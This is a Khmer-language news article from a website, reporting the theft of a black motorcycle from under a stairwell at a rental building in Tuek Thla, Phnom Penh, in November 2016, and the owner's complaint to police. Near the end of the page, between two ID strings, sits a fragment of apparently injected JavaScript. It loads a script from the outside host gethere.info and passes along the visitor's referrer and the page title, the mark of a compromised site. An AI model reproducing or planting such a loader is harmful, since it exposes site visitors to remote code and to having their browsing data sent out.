Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លួចម៉ូតូយកទៅបាត់ដោយសុវត្ថិភាពទៀតហើយទឹកថ្លា ! ទុកម៉ូតូក្នុងដីឡូខាងក្រោមឡើងទៅបន្ទប់ជួលជាន់ទី២ចុះវិញបាត់

ភ្នំពេញ៖ បុរសម្នាក់ខណះត្រឡប់មកពីស្រុកកំណើតទៅផ្ទះជួលហើយទុកម៉ូតូក្រោមកាំជណ្តើរក្នុងដីឡូខាងក្រោមឡើងទៅបន្ទប់ជួលជាន់ទី២ចុះវិញបាត់ម៉ូតូបង្ករភ្ញាក់ផ្អើរត្រូវបានបងប្អូននាំមកកាន់ប៉ុស្តិ៍នគរបាលរដ្ឋបាលទឹកថ្លាដាក់ពាក្យបណ្តឹង។

ករណីនេះបង្ករភ្ញាក់ផ្អើរការពីម៉ោង១១និង៣០នាទីថ្ងៃទី០៥វិច្ឆិការ២០១៦នៅចំណុចផ្ទះជួលផ្លូវបេតុង
ភូមិបុរី១០០ខ្នងសង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ។

ម្ចាស់ម៉ូតូឈ្មោះ មិល ថុល អាយុ២៦ឆ្នាំមុខរបរបុគ្គលិកធនាគាស្នាក់នៅបន្ទប់ជួលលេខបេ១០ជាន់ទី២ភូមិបុរី១០០ខ្នងសង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ។មានស្រុកកំណើតភូមិស្យាឃុំវាលពន់ស្រុកថ្ពងខេត្តកណពង់ស្ពឺ។

ប្រភពពីម្ចាស់ម៉ូតូបានប្រាប់ថានៅមុនកើតហេតុគាត់បានត្រឡប់មកពីស្រុកកំណើតទៅផ្ទះជួលហើយទុកម៉ូតូរបស់ខ្លួនម៉ាកសេ១២៥ពណ៌ខ្មៅសេរី២០១៦ពាក់ស្លាកលេខភ្នំពេញ1FQ-4688 ក្រោមកាំជណ្តើរក្នុងដីឡូខាងក្រោមឡើងទៅបន្ទប់ជួលជាន់ទី២ដើម្បីហូបបាយលុះចុះមកវិញបាត់ម៉ូតូតែម្តងបង្ករភ្ញាក់ផ្អើរត្រូវបានបងប្អូននាំមកកាន់ប៉ុស្តិ៍នគរបាលរដ្ឋបាលទឹកថ្លាដាក់ពាក្យបណ្តឹង។

ក្នុងករណីខាងលើនេះបើតាមកាំម៉េរ៉ាសុវត្តិភាពគឺបានឃើញភិនភាគជនសង្ស័យមានគ្នា២នាក់ជិះ
ម៉ូតូឌ្រឹមសង់សេ១២៥ពណ៌ខ្មៅចូលធ្វើសកម្មភាពកាច់យកម៉ូតូជនរងគ្រោះខាងលើដោយមានរូបភាពច្បាស់ល្អណាស់ស្គាល់ទាំស្លាកលេខម៉ូតូជបសង្ស័យទៀតសង្ឃឹមថាតាមរយ៉ះស្លាកលេខសមត្ថកិច្ចនិងស្រាវជ្រាវរកជនខាងលើឃើញមិនខាង។

ក្រោយកើតហេតុជនរងគ្រោះជាម្ចាស់ម៉ូតូបានបងប្អូនជូនមកកាន់ប៉ុស្តិ៍នគរបាលរដ្ឋបាលទឹកថ្លាដើម្បីដាក់ពាក្យបណ្តឹងនិងសូមអោយសមត្ថកិច្ចធ្វើការស្រាវជ្រាវរកមុខសញ្ញាខាងលើដើម្បីយកមកផ្តនទាទោសទៅតាមផ្លូវច្បាប់។

22cbd398-925c-4146-b8a3-238cdb9dba6c 77d39cb0-942f-4237-b325-ef6d0dd1724ds.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More